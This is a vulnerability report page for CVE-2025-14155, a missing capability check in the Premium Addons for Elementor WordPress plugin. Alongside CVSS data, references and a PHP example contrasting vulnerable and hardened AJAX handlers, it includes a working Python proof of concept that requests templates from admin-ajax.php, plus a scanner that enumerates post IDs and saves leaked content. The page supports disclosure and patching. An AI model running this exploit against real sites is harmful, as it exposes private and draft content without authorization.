Security Vulnerability Report
CVE-2025-14155 CVSS 5.3 MEDIUM

Published: 2025-12-23 10:15:43
Last Modified: 2026-04-08 17:20:25

Description

The Premium Addons for Elementor – Powerful Elementor Templates & Widgets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_template_content' function in all versions up to, and including, 4.11.53. This makes it possible for unauthenticated attackers to view the content of private, draft, and pending templates.
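The weakness class here is CWE-862, Missing Authorization: an AJAX callback that WordPress will run for anonymous requests and that never asks whether the caller is allowed to see the post it renders. The following is an added illustration of that pattern and of a hardened handler; it is not the plugin's own code (the real `get_template_content` function is linked under References). The class name, the `pa_get_template_content` action and `id` parameter (taken from this report's PoC), the nonce action name and the `render_template` helper are assumptions; the hook names and API functions are WordPress's real ones.

```php
<?php
// Added example, not Premium Addons' actual code. Action name, parameter
// name, nonce name and helper are assumptions for illustration only.

class PA_Template_Endpoint_Example {

    public function register_vulnerable() {
        // Vulnerable pattern: the same callback is wired to both the
        // logged-in hook and the "nopriv" hook, and the callback itself
        // performs no authorization, so any visitor reaches it.
        add_action( 'wp_ajax_pa_get_template_content',        array( $this, 'get_template_content_vulnerable' ) );
        add_action( 'wp_ajax_nopriv_pa_get_template_content', array( $this, 'get_template_content_vulnerable' ) );
    }

    public function register_fixed() {
        // Hardened registration: no nopriv hook at all. Note this alone is
        // not a fix; a subscriber-level account could still call the
        // logged-in hook, so the capability check below is what matters.
        add_action( 'wp_ajax_pa_get_template_content', array( $this, 'get_template_content_fixed' ) );
    }

    // CWE-862: any caller who supplies (or guesses) a post ID gets the
    // rendered content, including private, draft and pending posts.
    public function get_template_content_vulnerable() {
        $id = isset( $_REQUEST['id'] ) ? absint( $_REQUEST['id'] ) : 0;
        wp_send_json_success( array( 'content' => $this->render_template( $id ) ) );
    }

    // Hardened version: CSRF nonce, a role-level capability gate, and a
    // per-object check through WordPress's own read_post meta capability,
    // which maps to read_private_posts for private posts and to edit_post
    // for draft/pending posts, so each status is covered without
    // re-implementing the post-status rules here.
    public function get_template_content_fixed() {
        check_ajax_referer( 'pa_template_nonce', 'nonce' ); // assumed nonce action

        if ( ! current_user_can( 'edit_posts' ) ) {
            wp_send_json_error( 'Not allowed', 403 );
        }

        $id   = isset( $_REQUEST['id'] ) ? absint( $_REQUEST['id'] ) : 0;
        $post = get_post( $id );

        if ( ! $post || ! current_user_can( 'read_post', $post->ID ) ) {
            wp_send_json_error( 'Not allowed', 403 );
        }

        wp_send_json_success( array( 'content' => $this->render_template( $post->ID ) ) );
    }

    // Stand-in for the plugin's template rendering (assumption): returns
    // the raw post_content so the authorization difference is what shows.
    private function render_template( $id ) {
        $post = get_post( $id );
        return $post ? $post->post_content : '';
    }
}
```

The per-object `read_post` check is the part that maps directly to the report's impact statement: a global `current_user_can( 'edit_posts' )` gate stops anonymous and subscriber callers, but on its own it would still let a contributor read another author's private or pending template, which `read_post` denies.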

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:* - VULNERABLE
Premium Addons for Elementor <= 4.11.53 (all versions before 4.11.54; the NVD range is versionEndExcluding 4.11.54)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14155 PoC - Unauthorized Template Content Access
# Target: Premium Addons for Elementor plugin (<= 4.11.53)
# NOTE: the AJAX action name ('pa_get_template_content') and the 'id'
# parameter are as given in this PoC; confirm them against the plugin
# source referenced below (includes/addons-integration.php, tag 4.11.53)
# before relying on the result.

import requests


def exploit_cve_2025_14155(target_url, template_id=1):
    """
    Exploit for CVE-2025-14155: missing authorization in get_template_content.
    Allows unauthenticated attackers to view private/draft/pending templates.

    Args:
        target_url: Base URL of the WordPress site
        template_id: ID of the template to retrieve (default: 1)

    Returns:
        Template content if vulnerable, None otherwise
    """
    # The function is reached through WordPress's admin-ajax.php. No cookie
    # or nonce is sent, so a successful reply means the nopriv hook is
    # registered and no capability check is enforced.
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    data = {
        'action': 'pa_get_template_content',
        'id': template_id,
    }

    try:
        response = requests.post(ajax_url, data=data, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

    # admin-ajax.php answers "0" when the action is not registered for this
    # caller and "-1" when a nonce check fails; neither is template content.
    body = response.text.strip()
    if (response.status_code == 200 and body not in ('0', '-1')
            and ('content' in body or len(body) > 100)):
        print(f"[+] VULNERABLE! Template ID {template_id} content:")
        print(body)
        return body

    print(f"[-] Template ID {template_id} returned empty or not accessible")
    return None


def scan_templates(target_url, start_id=1, end_id=100):
    """Scan for accessible templates by iterating through post IDs."""
    print(f"[*] Scanning templates on {target_url}...")
    for template_id in range(start_id, end_id + 1):
        content = exploit_cve_2025_14155(target_url, template_id)
        if content:
            print(f"[+] Found accessible template: ID {template_id}")
            # Save to file for analysis
            filename = f"template_{template_id}_leak.txt"
            with open(filename, 'w', encoding='utf-8') as f:
                f.write(content)
            print(f"[+] Saved to {filename}")


# Example usage
if __name__ == "__main__":
    target = "http://target-wordpress-site.com"
    exploit_cve_2025_14155(target, 1)
    # scan_templates(target, 1, 50)  # Uncomment to scan multiple IDs

References

https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L1624 (Product)
https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L90 (Product)
https://plugins.trac.wordpress.org/changeset/3416254/ (Patch)
https://research.cleantalk.org/cve-2025-14155/
https://www.wordfence.com/threat-intel/vulnerabilities/id/135c33bb-5ec2-4697-9340-1d2651ff3a0b?source=cve (Third Party Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14155", "sourceIdentifier": "[email protected]", "published": "2025-12-23T10:15:43.297", "lastModified": "2026-04-08T17:20:24.867", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Premium Addons for Elementor – Powerful Elementor Templates & Widgets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_template_content' function in all versions up to, and including, 4.11.53. This makes it possible for unauthenticated attackers to view the content of private, draft, and pending templates."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "4.11.54", "matchCriteriaId": "64CFC13B-0B7D-4AAA-946C-74E74ED44158"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L1624", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L90", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3416254/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://research.cleantalk.org/cve-2025-14155/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/135c33bb-5ec2-4697-9340-1d2651ff3a0b?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}